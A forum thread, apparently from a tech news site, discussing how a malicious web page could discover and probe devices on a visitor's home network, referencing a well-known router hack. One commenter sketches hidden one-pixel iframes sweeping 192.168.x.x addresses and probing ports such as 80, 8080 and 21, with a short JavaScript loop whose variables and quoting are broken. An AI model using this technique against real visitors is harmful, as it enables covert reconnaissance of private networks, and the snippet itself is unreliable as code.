How's that better? That's like changing the port SSH listens on to 2222 even though root's password is "root".

Twice I've had routers notify me that 192.168.0.1 is in use by another network service and automatically remap its own services to 10.0.0.x. One of these times was due to a DSL modem's web administration being on 192.168.0.1.

Let's assume the users is on 192.168.50.0/24 can his attack figure that out?

The attack/code he showed cannot, but what you can do it write different iframes. Here is an example:

a+'.'+b+'.'+c+'.'+d

where a=192 b=168 c=0-255 b=0-255

Of course this could be any private network address range[1]. Next you would use document.write or .innertext to make these iframes. Personally I wouldn't stop at the first one. I would log all the frames that loaded into an array and from there test them further. I would also get the users IP address and tack on :80, :8080, :21, ect and see what I am presented with- web torrent frontends, ftp servers, ect.

[1] http://en.wikipedia.org/wiki/Private_network

This will take forever, and also make the user's browser unresponsive.

for(var c=0;i<255;i++) { for (var d=0;j<255;j++) { document.write('<iframe height="1" width="1" src="http://192.168. + c + '.' + d + '" id="' + i + '.' + j + '" name="' + c + '.' + d + '"></iframe>'); } }

<iframe> portscans, wow.

For a massively-deployed hack like Samy's, it makes plenty of sense to just check the small handful of major-brand wifi routers.

I totally agree. You should only be checking for routers that have known vulnerabilities, but was not the initial question.